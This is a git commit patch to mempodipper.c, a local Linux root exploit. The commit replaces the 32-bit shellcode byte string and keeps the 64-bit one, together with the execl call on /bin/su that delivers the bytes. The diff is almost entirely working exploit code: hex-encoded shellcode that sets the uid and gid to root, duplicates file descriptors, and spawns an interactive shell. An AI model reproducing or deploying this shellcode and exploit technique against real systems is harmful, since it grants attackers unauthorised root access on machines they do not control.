From 14b33f1b7c5c761cc089dede4fa6aeb187ff66ac Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Sun, 22 Jan 2012 06:16:39 +0100
Subject: Add 32bit shellcode.

---
 mempodipper.c | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)

(limited to 'mempodipper.c')

diff --git a/mempodipper.c b/mempodipper.c
index 1fb8cc2..fb20c26 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -203,24 +203,28 @@ int main(int argc, char **argv)
 		lseek64(fd, offset, SEEK_SET);
 		
 #if defined(__i386__)
-		// Shellcode from: http://www.shell-storm.org/shellcode/files/shellcode-599.php
+		// See shellcode-32.s in this package for the source.
 		char shellcode[] =
-			"\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f"
-			"\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80";
+			"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb3\x06\xb1"
+			"\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
+			"\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89\xe0\x31"
+			"\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80";
+
 #elif defined(__x86_64__)
+		// See shellcode-64.s in this package for the source.
 		char shellcode[] =
 			"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
 			"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
 			"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
 			"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
 			"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+
 #else
 #error "That platform is not supported."
 #endif
 		printf("[+] Executing su with shellcode.\n");
 		execl("/bin/su", "su", shellcode, NULL);
 	} else {
-		sleep(0.01);
 		char pid[32];
 		sprintf(pid, "%d", parent_pid);
 		printf("[+] Executing child from child fork.\n");
-- 
cgit v1.2.3-59-g8ed1b